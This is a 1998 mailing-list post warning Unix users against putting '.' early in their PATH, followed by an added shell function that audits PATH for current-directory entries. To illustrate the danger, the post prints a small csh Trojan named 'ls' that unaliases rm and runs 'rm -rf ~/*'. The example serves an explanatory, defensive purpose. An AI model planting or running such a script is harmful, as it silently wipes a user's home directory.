`.' in your path (was Re: XForms: Color Problem with Xforms)

Steve Lamont (spl@szechuan.ucsd.edu)
Sat, 22 Aug 98 12:57:48 PDT

# To subscribers of the xforms list from spl@szechuan.ucsd.edu (Steve Lamont) :

I have been taken to task by a member of this list regarding a recent
posting wherein I commented on the advisability of naming test
programs `test' and the location of `.' in the execution path.

Taking the last and more important issue first, let me clarify by
stating that I strongly disrecommend having `.' as the first entry in
your path or, in fact, anywhere other than at the last entry.

In case anyone missed the point of my somewhat tongue in cheek "extra
credit question" let me strongly state that having `.' anywhere but
at the end of the path is a Bad Idea.

I said:
> Not that I necessarily recommend having `.' first in your path (for
> extra credit, consider *why* you don't want `.' first in your path --
> use the terms "Trojan horse" and "rm -rf ~/*" in your answer).

I'd think that was pretty clear, the implication being that an evil
person could put an executable with the name of a common Unix command
somewhere where someone is likely to blunder, say `ls', which is a
shell script containing

#!/bin/csh -f

unset noglob
unalias rm

rm -rf ~/*

exit

for instance. Other obvious Trojan horses would be `telnet',
`rlogin', or `su' (assuming that you're not sufficiently cautious
about using `su' to remember to type

/bin/su

when you want to become root).

If you're especially paranoid, you may wish to eliminate `.' from your
path altogether. This action is particularly recommended for the root
account.

Regarding the naming of test programs, I was assuming, first of all,
that any `test' program would be a throwaway and would not be hanging
around for very long.

In fact, I went on to say:

> Personally, I call all my throwaway programs `try' but your mileage
> may vary.

I hope this clarifies the point in case anyone on the list managed to
miss it.

spl
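
Added example, not part of the original post: a POSIX shell check for the condition the message warns about. It goes beyond the literal `.' case by also flagging empty entries (a leading, trailing or doubled colon), which the shell treats as the current directory; the function name, the `strict' argument and the sample values are assumptions made for this illustration.

```shell
#!/bin/sh
# audit_path PATH_STRING [strict]
# Prints one line per entry that depends on the current directory:
#   SEVERITY INDEX KIND 'ENTRY'
# WARN = such an entry sits last in the path (the only place the post tolerates it)
# FAIL = it sits anywhere earlier, or "strict" was given (the post's advice
#        for the root account: no such entry at all).
# Returns 1 if any FAIL line was printed, 0 otherwise.
# Note: POSIX sh has no "local"; the variables below are plain globals.
audit_path() {
    rest="$1:"            # trailing colon keeps a final empty entry visible
    mode=${2:-normal}
    index=0
    rc=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}     # text up to the first colon
        rest=${rest#*:}       # remainder after that colon
        index=$((index + 1))
        case $entry in
            /*)   continue ;;         # absolute directory: not affected
            '')   kind=empty ;;       # "::", leading ":" or trailing ":" mean cwd
            .|./) kind=dot ;;
            *)    kind=relative ;;    # e.g. "bin": resolved against cwd as well
        esac
        if [ -z "$rest" ] && [ "$mode" != strict ]; then
            sev=WARN
        else
            sev=FAIL
            rc=1
        fi
        echo "$sev $index $kind '$entry'"
    done
    return "$rc"
}

# Constructed sample values, not taken from any real account.
for sample in "/usr/bin:/bin" ".:/usr/bin:/bin" "/usr/bin::/bin" "/usr/bin:/bin:."; do
    echo "PATH=$sample"
    audit_path "$sample" || echo "  -> current directory is searched before the end of the path"
done
```

To check a live session, call `audit_path "$PATH"`, or `audit_path "$PATH" strict` for the root account.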